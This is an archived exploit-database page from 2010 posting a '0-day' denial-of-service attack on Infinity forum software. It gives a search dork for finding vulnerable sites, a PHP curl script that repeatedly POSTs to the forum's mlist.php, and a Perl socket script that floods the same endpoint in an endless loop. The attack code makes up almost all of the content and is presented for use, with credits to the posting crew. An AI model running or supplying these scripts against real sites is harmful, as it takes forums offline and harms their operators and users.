Infinity 0-day Denial of Service
Posted on 13 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Infinity 0-day Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================ Infinity 0-day Denial of Service ================================ The largest Exploit Database in the world ! 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 #################################### 1 0 I'm SeeMe member from Inj3ct0r Team 1 1 #################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #[+] Dork: powered by infinity #[+] all versions 100% effected #[+] Finaly created by SeeMe #[+] Greetz to inj3ct0r Crew #[+] Site: Inj3ct0r.com <? set_time_limit(60); for($i = 1 ; $i <= 10 ; $i++) { //to put curl to send POST request $ch = curl_init(); //change http://127.0.0.1/forum to the url of the forum curl_setopt($ch , CURLOPT_URL , 'http://127.0.0.1/forum/mlist.php?'); curl_setopt($ch , CURLOPT_POST , 1) ; curl_setopt($ch , CURLOPT_POSTFIELDS , 'action='); curl_exec($ch); curl_close($ch); } //Finished check it out! ?> #Perl Script use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http://)//eg; for ($i=0; $i<10; $i--) { $user="inf".$rand.$i; $data = "action=" ; $len = length $data; $foo = "POST ".$dir."mlist.php HTTP/1.1 ". "Accept: * /* ". "Accept-Language: en-gb ". "Content-Type: application/x-www-form-urlencoded ". "Accept-Encoding: gzip, deflate ". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) ". "Host: $host ". "Content-Length: $len ". "Connection: Keep-Alive ". "Cache-Control: no-cache ". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print " "; system('ping $host'); sub usage { print " usage: "; print " $0 "; print " ex: $0 127.0.0.1 /forum/ "; print " ex2: $0 127.0.0.1 / "; exit(); }; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-13]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
